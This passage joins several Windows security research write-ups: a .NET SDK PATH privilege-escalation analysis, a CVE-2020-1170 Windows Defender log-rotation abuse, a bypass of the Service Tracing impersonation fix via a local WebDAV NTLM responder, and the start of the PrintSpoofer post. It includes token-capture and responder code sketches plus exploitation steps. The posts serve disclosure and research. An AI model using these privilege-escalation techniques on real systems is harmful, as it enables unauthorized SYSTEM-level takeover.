The DotnetHomePath string is generated based on the value of an Environment variable.

The name of the variable depends on PlateformHomeVariableName, which would be "USERPROFILE" here because the OS is Windows.

To conclude this first part of the analysis, we know that the DotNet tools’ path is built according to the following scheme: <ENV.USERPROFILE>\.dotnet\tools, where the value of ENV.USERPROFILE is returned by Environment.GetEnvironmentVariable(). So far, that’s consistent with what we observed with Process Monitor so we must be on the right track.

If we check the documentation of Environment.GetEnvironmentVariable(), we can read that, by default, the value is retrieved from the current process if an EnvironmentVariableTarget isn’t specified.

Now, if we take another look at the details of the Process Start operation in Process Monitor, we can see that the process uses the current user’s environment, although it’s running as NT AUTHORITY\SYSTEM. Therefore, the final tools path is resolved to C:\Users\lab-user\.dotnet\tools.

We now know how the path is determined so we have the answer to our first question. We now need to find out how this path is handled afterwards.

To answer the second question, we may go back to the Program.ConfigureDotNetForFirstTimeUse() method and see what’s executed after the CreateEnvironmentPath() function call.

Once the tools path has been determined, a new DotnetFirstTimeUseConfigurer object is created and the Configure() method is immediately called. At this point, the path information is stored in the EnvironmentPath object identified by the pathAdder variable.

In this method, the most relevant piece of code is framed in red on the below screenshot, where the AddPackageExecutablePath() method is invoked.

This method is very simple. The AddPackageExecutablePathToUserPath() method is called on the EnvironmentPath object.

The content of the AddPackageExecutablePathToUserPath() method finally gives us the answer to our second question.

First, this method retrieves the value of the PATH environment variable but, this time, it uses a slightly different way to do so. It invokes GetEnvironmentVariable with an additional EnvironmentVariableTarget parameter, which is set to 1.

From the documentation, we can read that if this parameter is set to 1, the value is retrieved from the HKEY_CURRENT_USER\Environment registry key. The current user being NT AUTHORITY\SYSTEM here, the value is retrieved from HKU\S-1-5-18\Environment.

The problem is that this applies to the SetEnvironmentVariable() method as well. Therefore, C:\Users\lab-user\.dotnet\tools\ is appended to the Path Environment variable of the LOCAL SYSTEM account in the registry.

As a conclusion, the .Net Core toolset path is created based on the current user’s environment but is applied to the LOCAL SYSTEM account in the registry because the process is running as NT AUTHORITY\SYSTEM, hence the vulnerability.

Conclusion

The status of this vulnerability is quite unclear. Since it wasn’t officially acknowledged by Microsoft, there is no CVE ID associated with this finding. Though, as mentioned in the introduction, it has partially been fixed. Namely, the C:\Users\<USER>\.dotnet\tools path is no longer appended to the Path if you use one of the latest .NET Core installers.

Now, what can you do to make sure your machine isn’t affected by this vulnerability?

First, check the following value in the registry.

C:\Windows\System32>reg query HKU\S-1-5-18\Environment /v Path

HKEY_USERS\S-1-5-18\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;

If you see something that is different from what is shown above, you may restore the default value using the following command as an administrator:

C:\Windows\System32>reg ADD HKU\S-1-5-18\Environment /v Path /d "%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;" /F
The operation completed successfully.

Then, you can update Visual Studio or the .Net SDK and check the registry once again. The “tools” folder should no longer be present.

Unfortunately, according to my latest tests, the %USERPROFILE% variable still gets resolved to the current user’s “home” folder. This means that the Path is still altered when installing the .Net SDK. Thankfully, this one cannot be exploited for local privilege escalation because the corresponding folder is owned by an administrator.

Links & Resources

CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability

Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender. Finding a vulnerability in a security-oriented product is quite satisfying. Though, there was nothing groundbreaking. It’s quite the opposite actually and I’m surprised nobody else reported it before me.

Introduction

Before diving into the technical details of this vulnerability, I want to say a quick word about the timeline. I initially reported this vulnerability through the Zero Day Initiative (ZDI) program around 8 months ago. After sending them my report, I received a reply stating that they weren’t interested in purchasing this vulnerability. At the time, I had only a few weeks of experience in Windows security research so I kind of relied on their judgement and left this finding aside. I even completely forgot about it in the following months.

Five months later, in late March 2020, I eventually went through my notes again and saw this report but, this time, my mindset was different. I had gained some experience because of a few other reports that I had sent to Microsoft directly. So, I knew that it was potentially eligible and I decided to spend a bit more time on it. It was a good decision because I even found a better way of triggering the vulnerability. I reported it to Microsoft in early April and it was acknowledged a few weeks later.

The Initial Thought Process

In the advisory published by Microsoft, you can read:

An elevation of privilege vulnerability exists in Windows Defender that leads to arbitrary file deletion on the system.

As usual, the description is quite generic. You’ll see that there is more to it than just an “arbitrary file deletion”.

The issue I found is related to the way Windows Defender log files are handled. In case you don’t know, Windows Defender uses 2 log files - MpCmdRun.log and MpSigStub.log - which are both located in C:\Windows\Temp. This directory is the default temp folder of the SYSTEM account but that’s also a folder where every user has Write access.

Although that may sound bad, it isn’t that bad because the permissions of the files are properly set (obviously?). By default, Administrators and SYSTEM have Full Control over these files, whereas normal users can’t even read them.

Here is an extract from a sample log file. As you can see, it is used to log events such as Signature Updates, but you can also find some entries related to Antivirus scans.

Signature updates are automatically done on a regular basis but they can also be triggered manually using the Update-MpSignature PowerShell command for example, which doesn’t require any particular privileges. Therefore, these updates can be triggered as a normal user, as shown on the screenshot below.

During the process, we can see that some information is being written to C:\Windows\Temp\MpCmdRun.log by Windows Defender (as NT AUTHORITY\SYSTEM).

What this means is that, as a low-privileged user, we can trigger a log file write operation by a process running as NT AUTHORITY\SYSTEM. Though we don’t have access to the file and we can’t control its content. We don’t even have Write access on the Temp folder itself so we wouldn’t be able to set it as a mount point either. I can’t think of a more useless attack vector right now. :laughing:

Though, following my experience with CVE-2020-0668 (again…) - A Trivial Privilege Escalation Bug in Windows Service Tracing - I knew that there was potentially more to it than just a log file write.

Think about it for a second: each time a Signature Update is done (which happens quite often), a new entry is added to the file, which represents around 1 KB. That’s not much, right? But how much would it represent after several months or even years? In such a case, log rotation mechanisms are often implemented so that old logs are compressed, archived or simply deleted. So, I wondered if such a mechanism was also implemented to handle the MpCmdRun.log file. If so, there is probably some room for a privileged file operation abuse…

Searching for a Log Rotation Mechanism

In order to find a potential log rotation mechanism, I began by reversing the MpCmdRun.exe executable itself. After opening the file in IDA, the very first thing I did was search for occurrences of the MpCmdRun string. My initial objective was to see how the log file was handled. Looking at the Strings window is usually a good way to start.

Not surprisingly, the first result was MpCmdRun.log. Though, another very interesting result came out of this search: MpCmdRun_MaxLogSize. I was looking for a log rotation mechanism and this string was clearly the equivalent of “Follow the white rabbit”. Obviously, I took the red pill and went down the rabbit hole. :sunglasses:

Looking at the Xrefs of MpCmdRun_MaxLogSize, I found that it was used in only one function: MpCommonConfigGetValue().

The MpCommonConfigGetValue() function itself is called from MpCommonConfigLookupDword().

Finally, MpCommonConfigLookupDword() is called from the CLogHandle::Flush() method.

The following part of CLogHandle::Flush() is particularly interesting because it’s responsible for writing to the log file.

First, we can see that GetFileSizeEx() is called on hObject (1), which is a handle pointing to the log file (MpCmdRun.log) at this point. The result of this function is returned in FileSize, which is a LARGE_INTEGER structure.

typedef union _LARGE_INTEGER {
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } DUMMYSTRUCTNAME;
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } u;
  LONGLONG QuadPart;
} LARGE_INTEGER;

Since MpCmdRun.exe is a 64-bit executable here, QuadPart is used to get the file size as a LONGLONG directly. This value is stored in v11 and is then compared against the value returned by MpCommonConfigLookupDword() (2). If the file size is greater than this value, the PurgeLog() function is called.

So, before going any further, we need to get the value returned by MpCommonConfigLookupDword(). To do so, the easiest way I found was to put a breakpoint right after this function call and get the result from the RAX register.

Here is what it looks like once the breakpoint is hit:

Therefore, we now know that the maximum file size is 0x1000000, i.e. 16,777,216 bytes (16MB).
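
Putting the two pieces together, the decompiled logic boils down to something like this. This is a simplified reconstruction, not Defender’s actual source code, and hLogFile stands for the hObject handle mentioned above.

LARGE_INTEGER FileSize = { 0 };
LONGLONG llMaxLogSize = 0x1000000; // MpCmdRun_MaxLogSize default: 16,777,216 bytes (16MB)

// If the log file is larger than the maximum size, rotate it
if (GetFileSizeEx(hLogFile, &FileSize) && FileSize.QuadPart > llMaxLogSize)
{
    // The PurgeLog() function is called here (more on that below)
}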

The next logical question would then be: what happens when the log file size exceeds this value? As we saw earlier, when the size of the log file exceeds 16MB, the PurgeLog() function is called. Based on the name, we may assume that we will probably find the answer to this second question inside this function.

When this function is called, a new filename is first prepared by concatenating the original filename and .bak. Then, the original file is moved, which means that MpCmdRun.log is renamed as MpCmdRun.log.bak. Now we have our answer: a log rotation mechanism is indeed implemented.

Here, I could have continued the reverse engineering process but I had something else in mind. Considering that knowledge, I wanted to adopt a simpler approach. The idea was to check the behavior of this mechanism under various conditions and observe the result using Procmon.

The Vulnerability

Here is what we know and what we have learnt so far:

  • Windows Defender writes some log events to C:\Windows\Temp\MpCmdRun.log (e.g.: Signature Updates).
  • Any user can create files and directories in C:\Windows\Temp\.
  • A log rotation mechanism prevents the log file from exceeding 16MB by moving it to C:\Windows\Temp\MpCmdRun.log.bak and creating a new one.

Do you see where I’m going here? Can you spot the potential issue? What would happen if there was already something named MpCmdRun.log.bak in C:\Windows\Temp\? :thinking:

To answer this question, I considered the following test protocol:

  1. Create something called MpCmdRun.log.bak in C:\Windows\Temp\.
  2. Fill C:\Windows\Temp\MpCmdRun.log with arbitrary data so that its size is close to 16MB.
  3. Trigger a Signature Update.
  4. Observe the result with Procmon.

If MpCmdRun.log.bak is an existing file, it is simply overwritten. We may assume that it’s the intended behavior so this test isn’t very conclusive. Rather, the very first test case scenario that came to my mind was: what if MpCmdRun.log.bak is a directory?

If MpCmdRun.log.bak isn’t a simple file, we may assume that it cannot be simply overwritten. So, my initial assumption was that the log rotation would simply fail. Instead of creating a backup of the original log file, it would just be overwritten. Though, the behavior I observed with Procmon was far more interesting than that. Defender actually deleted the directory and then proceeded with the normal log rotation. So, I decided to redo this test but, this time, I also created files and directories inside C:\Windows\Temp\MpCmdRun.log.bak\. It turns out that the deletion was actually recursive!

That’s interesting! Now, the question is: can we redirect this file operation with a junction?

Here is the initial setup for this test case:

  • A dummy target directory is created: C:\ZZ_SANDBOX\target.
  • MpCmdRun.log.bak is created as a directory and is set as a mountpoint to this directory.
  • The MpCmdRun.log file is filled with 16,777,002 bytes of arbitrary data.

The target directory of the mountpoint contains a folder and a file.

And here is what I observed in Procmon after executing the Update-MpSignature PowerShell command:

Defender followed the mountpoint, deleted every file and folder recursively and finally deleted the folder C:\Windows\Temp\MpCmdRun.log.bak\ itself. Nice! This means that, as a normal user, we can trick this service into deleting any file or folder we want on the filesystem…

Exploitability

As we saw in the previous part, exploitation is quite straightforward. The only thing we would have to do is create the directory C:\Windows\Temp\MpCmdRun.log.bak\ and set it as a mountpoint to another location on the filesystem.

Note: actually it’s not that simple because an additional trick is required if we want to perform a targeted file or directory deletion but I won’t discuss this here.

We face one practical issue though: how long would it take to fill the log file until its size exceeds 16MB? That is quite a high value for a simple log file. So, I did several tests and measured the time required by each command. Then, I extrapolated the results in order to estimate the overall time it would take. It should be noted that the Update-MpSignature command cannot be run multiple times in parallel (which makes sense for an update process).

Test #1

As a first test, I chose a naive approach. I ran the Update-MpSignature command a hundred times and measured the overall time it would take.

Here is the result of this first test. With this technique, it would take more than 22 hours to fill the file and trigger the vulnerability if we ran the Update-MpSignature command in a loop.

DESCRIPTION                                    TIME                    FILE SIZE          # OF CALLS
Raw data for 100 calls                         650s (10m 50s)          136,230 bytes      100
Estimated time to reach the target file size   80,050s (22h 14m 10s)   16,777,216 bytes   12,316

That’s not very practical, to say the least.

Test #2

After test #1, I checked the documentation of the Update-MpSignature command to see if it could be tweaked in order to speed up the entire process. This command has a very limited set of options but one of them caught my eye.

This command accepts an UpdateSource as a parameter, which is actually an enumeration as we can see on the previous screenshot. When using most of the available values, an error message is immediately returned and nothing is written to the log file so they would be useless for this exploit scenario.

Though, when using the InternalDefinitionUpdateServer value, I observed an interesting result.

Since my VM is a standalone installation of Windows, it isn’t configured to use an “internal server” for the updates. Instead, they are received directly from MS servers, hence the error message.

The main benefit of this method is that the error message is returned almost instantly but the event is still written to the log file, which makes it a very good candidate for the exploit in this particular scenario.

Therefore, I ran this command a hundred times as well and observed the result.

This time, the 100 calls took less than 4 seconds to complete. This wasn’t enough for calculating relevant stats so I ran the same test again, with 10,000 calls.

Here is the result of this second test.

DESCRIPTION                                    TIME                    FILE SIZE          # OF CALLS
Raw data for 10,000 calls                      363s (6m 2s)            2,441,120 bytes    10,000
Estimated time to reach the target file size   2,495s (41m 35s)        16,777,216 bytes   68,728

With this slight adjustment, the overall operation would take around 40 minutes, instead of more than 22 hours with the previous command. This would therefore drastically reduce the amount of time required to fill the log file. It should also be noted that these values correspond to the worst-case scenario, where the log file would initially be empty.

I considered that this value was acceptable so I implemented this trick in a Proof-of-Concept. Here is a screenshot showing the result.

Starting from an empty log file, the PoC took around 38 minutes to complete, which is very close to the estimation I had made previously.

As a side note, if you paid attention to the last screenshot, you probably noticed that I specified C:\ProgramData\Microsoft\Windows\WER as the target directory to delete. I didn’t choose this path randomly. I chose this one because, once this folder has been removed, you can get code execution as NT AUTHORITY\SYSTEM as explained by @jonaslyk in this post: From directory deletion to SYSTEM shell.

Conclusion

This is probably the last blog post in which I write about this kind of privileged file operation abuse. In an email sent to all vulnerability researchers, Microsoft announced that they changed the scope of their bounty. Therefore, such exploits are no longer eligible. This decision is justified by the fact that a generic patch is in development and will address this entire bug class.

I have to say that this decision sounds a bit premature. It would be understandable if this patch were already implemented in the latest Insider Preview build of Windows 10 but that’s not the case. I would assume that this is more of an economic decision than a pure technical matter, as such a bounty program probably represents a cost of hundreds of thousands of dollars per month.

Links & Resources

Chimichurri Reloaded - Giving a Second Life to a 10-year old Windows Vulnerability

This is a kind of follow-up to my last post, in which I discussed a technique that can be used for elevating privileges to SYSTEM when you have impersonation capabilities. In the last part, I explained how this type of vulnerability could be fixed and I even illustrated it with a concrete example of a workaround that was implemented by Microsoft 10 years ago in the context of the Service Tracing feature. Though, I also insinuated that this security measure could be bypassed. So, let’s see how we can make a 10-year old vulnerability great again…

What Are We Talking About?

I won’t assume that you’ve read all of my previous blog posts, so I’ll start things off with a brief recap.

Around 10 years ago, Cesar Cerrudo (@cesarcer) found that it was possible to use the Service Tracing feature of Windows as a way of capturing a SYSTEM token using a named pipe. As long as you had the SeImpersonatePrivilege privilege, you could then execute arbitrary code in the security context of this user. Back then, this was acknowledged by Microsoft as a vulnerability and it got the CVE ID CVE-2010-2554.

Let’s take the Service Tracing key corresponding to the RASMAN service as an example. The idea is simple, you first have to start a local named pipe server. Then, instead of setting a simple directory path as the target log file’s folder in the registry, you can specify the path of this named pipe.

In this example, \\localhost\pipe\tracing is set as the target directory. Then, as soon as EnableFileTracing is set to 1, the service will try to open its log file using the path \\localhost\pipe\tracing\RASMAN.LOG. So, if we create a named pipe with the name \\.\pipe\tracing\RASMAN.LOG, we will receive a connection and we can impersonate the service account by calling the ImpersonateNamedPipeClient function. Since RASMAN is running as NT AUTHORITY\SYSTEM, we eventually get a SYSTEM impersonation token.

Note: depending on the version of Windows, the log file open event sometimes doesn’t occur immediately when EnableFileTracing is set to 1. One way to trigger it reliably is to start the service. Note that the RASMAN service can be started by low-privileged users via the Service Control Manager (SCM).
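
For illustration, the listener side of this technique could look something like the following sketch (error handling omitted). It assumes the tracing registry values have already been configured as described above.

#include <Windows.h>

void CaptureRasmanToken()
{
    BYTE buffer[0x1000] = { 0 };
    DWORD dwBytesRead = 0;
    HANDLE hToken = NULL;

    // The pipe name must match the path the service will open: \\localhost\pipe\tracing\RASMAN.LOG
    HANDLE hPipe = CreateNamedPipe(L"\\\\.\\pipe\\tracing\\RASMAN.LOG", PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_BYTE | PIPE_WAIT, 1, 0x1000, 0x1000, 0, NULL);

    // Wait for the RASMAN service to open its "log file", i.e. our pipe
    if (ConnectNamedPipe(hPipe, NULL) || GetLastError() == ERROR_PIPE_CONNECTED)
    {
        // Read some data first, otherwise the impersonation request may be rejected
        ReadFile(hPipe, buffer, sizeof(buffer), &dwBytesRead, NULL);

        // Impersonate the client (NT AUTHORITY\SYSTEM) on the current Thread
        if (ImpersonateNamedPipeClient(hPipe))
        {
            OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken);
            // ... inspect or duplicate hToken here ...
            RevertToSelf();
        }
    }

    CloseHandle(hPipe);
}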

Of course, if you try to do this on a version of Windows that is less than 10 years old, you’ll run into the same problem that is shown on the above screenshot. If you try to execute arbitrary code in the security context of the impersonated user, you’ll get the error code 1346, i.e. “Either a required impersonation level was not provided, or the provided impersonation level is invalid”. You could also get the error code 5, i.e. “Access denied”. It’s the result of a counter-measure that was enforced by Microsoft in this particular Windows feature.

I detailed this security update in my previous post. To put it simply, the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are now specified in the CreateFile function call, which is responsible for getting the initial handle on the target log file. Because of these flags, the resulting impersonation level of the token we get is now SecurityIdentification (level 2/4). Though, SecurityImpersonation (level 3/4) or SecurityDelegation (level 4/4) is required in order to fully impersonate the user.

Note: as a side note, you probably noticed that the message Unknown error 0x80070542 is printed on the command prompt instead of the actual Win32 error message. The reason for this is that I try to get the error message corresponding to the error code while impersonating the user. Because of the limited impersonation level, this code/message lookup fails.

Does it mean we are screwed? Short answer, yes, we are because the token we get is kinda useless. Long answer, well, you’ll have to read the next parts… :wink:

A UNC Path?

In the previous part, we saw that if we specify the name of a pipe as the log file directory, we do get an impersonation token but we cannot use it to create a new process. OK but did you notice how I glossed over an important detail here? How did I specify the name of a pipe in the first place?

First you need to know how the final log file path is calculated. That’s trivial, it’s a simple string concatenation: <DIRECTORY>\<SERVICE_NAME>.LOG, where <DIRECTORY> is read from the registry (FileDirectory value). So, if you specify C:\Temp as the output directory for a service called Bar, the service will use C:\Temp\BAR.LOG as the path of its log file.

In this exploit though, we specified the name of a pipe rather than a regular directory, by using a UNC path. On Windows, there are many ways to specify a path and this is only one of them but this post isn’t about that. Actually, UNC (Universal Naming Convention) is exactly what we need, but we need to use it slightly differently.

UNC paths are commonly used for accessing remote shares on a local network. For example, if you want to access the folder BAR on the volume FOO of the machine DUMMY, you’ll use the UNC path \\DUMMY\FOO\BAR. In this case, the client machine connects to the TCP port 445 of the target server and uses the SMB protocol to exchange data.

There is a slight variant of this example that you probably already know of. You can use a path such as \\DUMMY@4444\FOO\BAR in order to access a remote share on an arbitrary port (4444 in this example) rather than the default TCP port 445. Although the difference in the path is small, the implications are huge. The most obvious one is that the SMB protocol is no longer used. Instead, the client uses an extended version of the HTTP protocol, which is called WebDAV (Web Distributed Authoring and Versioning).

On Windows, WebDAV is handled by the WebClient service. If you check the description of this service, you can read the following:

Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these functions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

Although WebDAV uses a completely different protocol, one thing remains: authentication. So, what if we create a local WebDAV server and use such a path as the output directory?

Hello, I’m Officer Dave. May I See Your ID, Please?

First things first, we need to edit the registry and change the value of FileDirectory. We will set \\127.0.0.1@4444\tracing instead of a named pipe path.

Thanks to netcat, we can easily open a socket and listen on the local TCP port 4444. After enabling the service tracing, here is what we get:

Interesting! We get an HTTP OPTIONS request. The User-Agent header also shows us that this is a WebDAV request but, apart from that, there’s not much to learn. Though, now that we know that the service is willing to communicate using WebDAV, we should reply and send an authentication request. :wink:

To do so, I created a simple PowerShell script that uses a System.Net.Sockets.TcpListener object to listen on an arbitrary port and send a hardcoded HTTP response to the first client that connects to the socket. Here is the content of the HTTP response we will send to the client:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: NTLM

If you are familiar with web application pentesting, there is a high chance you’ve encountered the WWW-Authenticate header with the value Basic quite a lot (e.g.: Apache htpasswd), but not necessarily NTLM. This value allows us to indicate that the client must authenticate using the 3-way NTLM authentication scheme. By the way, if you feel like you need to fill some gaps about NTLM, I highly recommend reading this excellent post about NTLM relaying by @HackAndDo. These blog posts are always very well written. :slightly_smiling_face:
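If you prefer compiled code over PowerShell, a minimal Winsock equivalent of such a one-shot responder could look like the following sketch. The port and the response are hardcoded; this is not the actual script used here, just an illustration of the idea.

#include <winsock2.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

int main(void)
{
    WSADATA wsa;
    SOCKET sockServer, sockClient;
    struct sockaddr_in addr = { 0 };
    char buffer[4096];
    const char* response = "HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: NTLM\r\nContent-Length: 0\r\n\r\n";

    WSAStartup(MAKEWORD(2, 2), &wsa);

    // Listen on 127.0.0.1:4444 and handle a single client
    sockServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = htons(4444);
    bind(sockServer, (struct sockaddr*)&addr, sizeof(addr));
    listen(sockServer, 1);

    sockClient = accept(sockServer, NULL, NULL);
    recv(sockClient, buffer, sizeof(buffer), 0);            // read the OPTIONS request
    send(sockClient, response, (int)strlen(response), 0);   // reply with the 401 challenge

    closesocket(sockClient);
    closesocket(sockServer);
    WSACleanup();
    return 0;
}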

With the script running in the background, we get the following result:

At first glance, it looks like the service agreed to initiate the NTLM authentication and sent us its NTLM NEGOTIATE message. This is confirmed by the output of Wireshark.

This is a good start, we are definitely on the right track but there is one last thing to verify. This one last thing will decide whether all of this was for nothing or not: the Negotiate Identify flag.

The NTLM authentication protocol documentation is quite exhaustive. You can see the detailed structure of each message that is used in the protocol. In particular, this section explains how the NegotiateFlags value is calculated in the NEGOTIATE message. About the Identify flag, you can read:

So, if this bit is set, the client tells the server that it can request a token with an impersonation level of SecurityIdentification only. In other words, if this flag is set, we are back to square one. We won’t be able to get a proper impersonation token.
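To make this more concrete, here is a small sketch showing how this bit could be checked in a raw NEGOTIATE message received by our rogue server. The flag value (NTLMSSP_NEGOTIATE_IDENTIFY = 0x00100000) and the offset of the NegotiateFlags field come from the MS-NLMP documentation.

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define NTLMSSP_NEGOTIATE_IDENTIFY 0x00100000

// Sketch: check the Identify bit in a raw NTLM NEGOTIATE message.
// Layout per MS-NLMP: "NTLMSSP\0" signature (8 bytes), MessageType (4 bytes),
// then NegotiateFlags (4 bytes, little-endian) at offset 12.
BOOL IsIdentifyFlagSet(const BYTE* pbMessage, DWORD cbMessage)
{
    DWORD dwFlags;

    if (cbMessage < 16 || memcmp(pbMessage, "NTLMSSP\0", 8) != 0)
        return FALSE;

    memcpy(&dwFlags, pbMessage + 12, sizeof(dwFlags));
    wprintf(L"NegotiateFlags = 0x%08lx\n", dwFlags);

    return (dwFlags & NTLMSSP_NEGOTIATE_IDENTIFY) != 0;
}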

Thanks to the amazing Wireshark dissectors, we can easily check the value of this flag.

The Identify flag is not set!!! :tada:

This means that we can bypass the patch and get an impersonation token that we can use to execute arbitrary code in the context of NT AUTHORITY\SYSTEM. What we need to do next is simply complete the NTLM authentication thanks to an NTLM negotiator. This will allow us to transform this raw NTLM exchange into a token that we can then use if we have impersonation privileges. Though, I won’t talk about this here because this subject is already covered by the *Potato exploits.

The below screenshot shows the result of the PoC I implemented.

A Quick Bug Analysis

There is still some work to do in order to fully understand why this trick works. I won’t write a detailed analysis here but I’ll share some insight.

First, there is one detail that you may have noticed while reading the previous part. The service is requesting the resource /tracing rather than /tracing/RASMAN.LOG. Weird, isn’t it? :thinking:

Since we specified \\127.0.0.1@4444\tracing as the directory path, you’d expect that the service uses the path \\127.0.0.1@4444\tracing\RASMAN.LOG and therefore requests /tracing/RASMAN.LOG. Of course, there is an explanation. If you take a quick look at the code of the TraceCreateClientFile function in rtutils.dll, you’ll see that, before trying to open the log file, it begins by checking whether the directory specified in the FileDirectory value exists.

On the below screenshot, you can see that if CreateDirectory succeeds, i.e. if the target directory didn’t exist and was successfully created, then the function immediately returns. In this case, the log file is never opened and you’d have to disable the tracing and re-enable it. In other words, for the TraceCreateClientFile function to complete, this CreateDirectory call must fail.
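In pseudo-C, the relevant logic looks roughly like this (a simplified reconstruction based on the description above, not the actual decompiled code):

#include <windows.h>

void TraceCreateClientFile_Sketch(LPCWSTR pwszFileDirectory)
{
    if (CreateDirectoryW(pwszFileDirectory, NULL))
    {
        // The directory did not exist and was just created: the function
        // returns immediately, so the log file is not opened on this call.
        return;
    }

    // The directory already "exists" (CreateDirectoryW failed), so the
    // hardened CreateFile call on <FileDirectory>\<SERVICE>.LOG follows...
}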

The first HTTP request we receive on our WebDAV server is actually the result of this initial check. Moreover, CreateDirectory is nothing more than a user-friendly wrapper for the NtCreateFile function. Yes, everything is a file, even on Windows! :upside_down_face:

This CreateDirectory function is very convenient but there is a problem: it doesn’t allow you to specify custom flags, such as the ones used to restrict the impersonation level of the token. This explains why I was able to get a proper impersonation token using this trick.

BOOL CreateDirectoryW(
  LPCWSTR               lpPathName,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
);

Does it mean that I was lucky? What would happen if the server actually requested /tracing/RASMAN.LOG via the hardened CreateFile function call? To answer this question, I compiled the following code:

HANDLE hFile = CreateFile(
    argv[1], 
    GENERIC_READ | GENERIC_WRITE, 
    0, 
    NULL, 
    OPEN_EXISTING, 
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, // <- Limited token
    NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
    wprintf(L"CreateFile OK\n");
    CloseHandle(hFile);
}
else
{
    PrintLastErrorAsText(L"CreateFile");
}

Then, instead of waiting for the RASMAN service to connect, I manually triggered the WebDAV access using this dummy application as a low-privileged user. And… here is the result:

Although the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are specified in the CreateFile function call, we still get a token with the impersonation level SecurityImpersonation! In conclusion, yes, I was a bit lucky, but it’s not just luck: as it turns out, the WebClient service is also flawed.

Conclusion

In this post, I explained how it is possible to easily bypass a security patch that was originally implemented to prevent a malicious server application from getting a usable impersonation token by leveraging the Service Tracing feature. Though I have to give part of the credit to this MS16-075 exploit that was written by a colleague of mine a couple of years ago. It served as a great inspiration.

I don’t know yet if I’ll publish this as a tool or not. There is still some work to do in order to make it a usable tool because of the many Service Tracing keys that can be triggered. Moreover, there is still a major prerequisite for this trick to work: the WebClient service must be installed and enabled. Although this is the default on Workstations, it’s not the case for Servers. On a server, you would need to install/enable the WebDAV component as an additional feature.

Lastly, I didn’t take the time to push the investigation further. There is a lot more work to do in order to understand why the request coming from the WebClient service doesn’t take the SECURITY_IDENTIFICATION flag of the CreateFile call into consideration. In my opinion, this is a vulnerability but, who cares? :pensive:

Links & Resources

PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019

Over the last few years, tools such as RottenPotato, RottenPotatoNG or Juicy Potato have made the exploitation of impersonation privileges on Windows very popular among the offensive security community. Though, recent changes to the operating system have intentionally or unintentionally reduced the power of these techniques on Windows 10 and Server 2016/2019. Today, I want to introduce a new tool that will allow pentesters to easily leverage these privileges again.

Foreword

Please note that I used the term “new tool” and not “new technique”. If you read this article in the hope of learning a new leet technique, you will be disappointed. In fact, I’m going to discuss two very well-known techniques that can be combined together in order to achieve privilege escalation from LOCAL SERVICE or NETWORK SERVICE to SYSTEM. To my knowledge, there hasn’t been any public mention of using this particular trick in this context but, of course, I might be wrong. :roll_eyes:

Note: I developed the tool and started preparing this blog post prior to the publication of this blog post by James Forshaw: Sharing a Logon Session a Little Too Much. I could have chosen to cancel the publication of my post but I eventually realized that it was still worth it. Please keep this in mind as you read this post.

Impersonation Privileges

I want to start things off with this quote from @decoder_it: “if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM”. That’s a deliberately provocative shortcut obviously, but it’s not far from the truth. :smile:

These two privileges are very powerful indeed. They allow you to run code or even create a new process in the context of another user. To do so, you can call CreateProcessWithToken() if you have SeImpersonatePrivilege or CreateProcessAsUser() if you have SeAssignPrimaryTokenPrivilege.

Before talking about these two particular functions, I want to quickly remind you what the standard CreateProcess() function looks like:
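For reference, here is its prototype, as defined in the Windows API:

BOOL CreateProcessW(
  LPCWSTR               lpApplicationName,
  LPWSTR                lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCWSTR               lpCurrentDirectory,
  LPSTARTUPINFOW        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);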

The first two parameters allow you to specify the application or the command line you want to execute. Then, a lot of settings can be specified in order to customize the environment and the security context of the child process. Finally, the last parameter is a reference to a PROCESS_INFORMATION structure which will be returned by the function upon success. It contains the handles to the target process and thread.

Let’s take a look at CreateProcessWithToken() and CreateProcessAsUser() now:
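Here are their prototypes, again taken from the Windows API:

BOOL CreateProcessWithTokenW(
  HANDLE                hToken,
  DWORD                 dwLogonFlags,
  LPCWSTR               lpApplicationName,
  LPWSTR                lpCommandLine,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCWSTR               lpCurrentDirectory,
  LPSTARTUPINFOW        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);

BOOL CreateProcessAsUserW(
  HANDLE                hToken,
  LPCWSTR               lpApplicationName,
  LPWSTR                lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCWSTR               lpCurrentDirectory,
  LPSTARTUPINFOW        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);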

As you can see, they are not much different than the standard CreateProcess() function. However, they both require a handle to a token. According to the documentation, hToken must be “a handle to the primary token that represents a user”. Further, you can read “To get a primary token that represents the specified user, […] you can call the DuplicateTokenEx function to convert an impersonation token into a primary token. This allows a server application that is impersonating a client to create a process that has the security context of the client.”

